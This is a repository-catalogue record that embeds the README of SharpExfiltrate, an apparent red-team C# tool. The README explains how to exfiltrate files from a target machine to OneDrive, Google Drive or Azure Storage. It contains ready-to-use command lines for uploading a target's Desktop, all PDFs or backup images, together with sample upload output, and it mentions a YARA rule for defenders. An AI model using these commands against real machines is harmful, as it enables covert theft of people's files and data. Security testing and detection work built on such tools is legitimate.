{"id":18831772,"url":"https://github.com/flangvik/sharpexfiltrate","last_synced_at":"2025-04-14T04:16:44.878Z","repository":{"id":40312175,"uuid":"404354244","full_name":"Flangvik/SharpExfiltrate","owner":"Flangvik","description":"Modular C# framework to exfiltrate loot over secure and trusted channels.","archived":false,"fork":false,"pushed_at":"2021-09-12T17:08:02.000Z","size":43,"stargazers_count":125,"open_issues_count":0,"forks_count":37,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-14T04:16:40.819Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-09-08T13:17:00.000Z","updated_at":"2025-03-29T07:06:59.000Z","dependencies_parsed_at":"2022-06-29T05:57:28.197Z","dependency_job_id":null,"html_url":"https://github.com/Flangvik/SharpExfiltrate","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/SharpExfiltrate/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248819412,"owners_count":21166477,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T01:55:56.572Z","updated_at":"2025-04-14T04:16:44.859Z","avatar_url":"https://github.com/Flangvik.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SharpExfiltrate\nSharpExfiltrate is a tiny but modular C# framework to exfiltrate loot over secure and trusted channels. It supports both single-files and full-directory paths (recursively), file extension filtering, and file size filtering.\nExfiltrated data will be compressed and encrypted before being uploaded.\nWhile exfiltrating a large amount of data will require the output stream to be cached on disk, smaller exfiltration operations can be done all in memory with the \"memoryonly\" option. \n\n# Usage\n\n```\n.\\SharpExfiltrate.exe OneDrive --username \u003credacted\u003e --password \"\u003credacted\u003e\" --filepath \"C:\\Users\\\u003credacted\u003e\\Downloads\\balenaEtcher-Setup-1.5.120.exe\"\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n[+] Compressing C:\\Users\\\u003credacted\u003e\\Downloads\\balenaEtcher-Setup-1.5.120.exe 140,8MB\n[+] Password for Zip file is be4886d6a9004ed\n[+] Launching OneDrive module by @Flangvik\n[+] Performing Authentication using provided credentials\n[+] Confirming access to https://graph.windows.net\n[+] Starting OneDrive upload\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (7%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (14%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (28%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (35%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (64%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (71%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (85%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (99%)\n[+] Upload completed, file located: https://\u003credacted\u003e-my.sharepoint.com/personal/\u003credacted\u003e/Documents/DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip\n```\n\nUpload The entire targets Desktop folder, including files and subfolders, using the OneDrive module.\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com --password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\Desktop\"\n```\n\n\nUpload all PDFs from all subfolders in the targets root directory, compressing them all in memory, using the GoogleDrive module\n```\n.\\SharpExfiltrate.exe GoogleDrive --appname SuperLegitApp --accesstoken \"\u003caccess-token-string\u003e\" --filepath \"C:\\Users\\\u003cuser\u003e\\\" --extensions \"pdf;\" --memoryonly\n```\n\n\nUpload all files from all subfolders that are smaler then 1 MB in the targets root directory, using the OneDrive module.\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com --password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\\" --size 1\n```\n\n\nUpload a huge ISO image using the OneDrive module\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com --password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\Backup\\2021_09_09_Win10Image.iso\"\n```\n\n\nUpload all backup images that are less then 500 MB, using the Azure Storage Account module\n```\n.\\SharpExfiltrate.exe AzureStorage --connectionstring \u003cconnection-string\u003e --filepath \"C:\\Users\\\u003cuser\u003e\\Backup\\Images\" --extensions \"vmdk;vmx;iso;ovf;ova;flp\" --size 500\n```\n\n\n# Modules\n\nEach module within SharpExfiltrate can be acccess with a module pre-verb    \n\n```\n.\\SharpExfiltrate.exe \n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  OneDrive        Exfiltrate information using the OneDrive module\n\n  GoogleDrive     Exfiltrate information using the GoogleDrive module\n\n  AzureStorage    Exfiltrate information using the Azure Storage Account module\n\n  help            Display more information on a specific command.\n\n  version         Display version information.\n```\n## OneDrive\n\nThe OneDrive module uses a password and username to fetch an access token against the graph API (OneDrive). Note that testing has only been done on Office365 business accounts (tenant joined). MFA needs to be disabled for the 0Auth flow to work.\n```\n.\\SharpExfiltrate.exe OneDrive\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -u, --username      Required. Username (email) for the OneDrive account to store exfiltrated data\n\n  -p, --password      Required. Password for the OneDrive account to store exfiltrated data\n\n  -f, --filepath      Required. Path to file or directory to be exfiltrated\n\n  -e, --extensions    Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size          Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly    Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help              Display this help screen.\n\n  --version           Display version information.\n  ```\n\n\n## GoogleDrive\nThe GoogleDrive modules uses a Access Token that can be generated over at https://developers.google.com/oauthplayground/. Scroll down until you find \"Drive API v3\" on the left hand side. Click it and select ```https://www.googleapis.com/auth/drive.file```, go down and click \"Authorize APIs\", accept and follow the login steps. You should then be taken to a page where you generate and copy out our Access token. Keep in mind that the access token expries after 3600 seconds.\n\n\n```\n.\\SharpExfiltrate.exe GoogleDrive\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -n, --appname        Required. GoogleDrive Application name (Can be anything)\n\n  -t, --accesstoken    Required. Valid access token onbehalf of your GoogleDrive account\n\n  -f, --filepath       Required. Path to file or directory to be exfiltrated\n\n  -e, --extensions     Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size           Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly     Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help               Display this help screen.\n\n  --version            Display version information.\n  ```\n\n## Azure Storage Account\n\nThe Azure Storage Account module uses a connection string to create a subfolder (container) called \"loot\" to which it uploads the exfiltrated data. This requires a Storage Account to be created in Azure, the connection string can be found under \"Access keys\" in your Storage Account submenu.\n\n```\n.\\SharpExfiltrate.exe AzureStorage\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -c, --connectionstring    Required. Connection string to your Azure Storage Account\n\n  -f, --filepath            Required. Path to file or directory to be exfiltrated\n\n  -e, --extensions          Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size                Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly          Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help                    Display this help screen.\n\n  --version                 Display version information.\n\n  ```\n\n\n\n## Detection / Defense\nSee the included yara rule :) \n\n\n# Credits\n\n* https://github.com/KoenZomers/OneDriveAPI (OneDrive API in .NET)\n* https://medium.com/geekculture/upload-files-to-google-drive-with-c-c32d5c8a7abc (Usage of Google Drive API in .NET)\n* https://github.com/googleapis/google-api-dotnet-client (Google Drive API in .NET)\n* https://github.com/Azure/azure-storage-net (Azure Storage API in .NET)\n* https://github.com/icsharpcode/SharpZipLib (ZIP API in .NET)\n* https://github.com/CCob/dnMerge (Merges all them deps into the binary)\n* https://github.com/GhostPack/Rubeus/blob/master/Rubeus.yar (Template for my yara rules)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fsharpexfiltrate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fsharpexfiltrate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fsharpexfiltrate/lists"}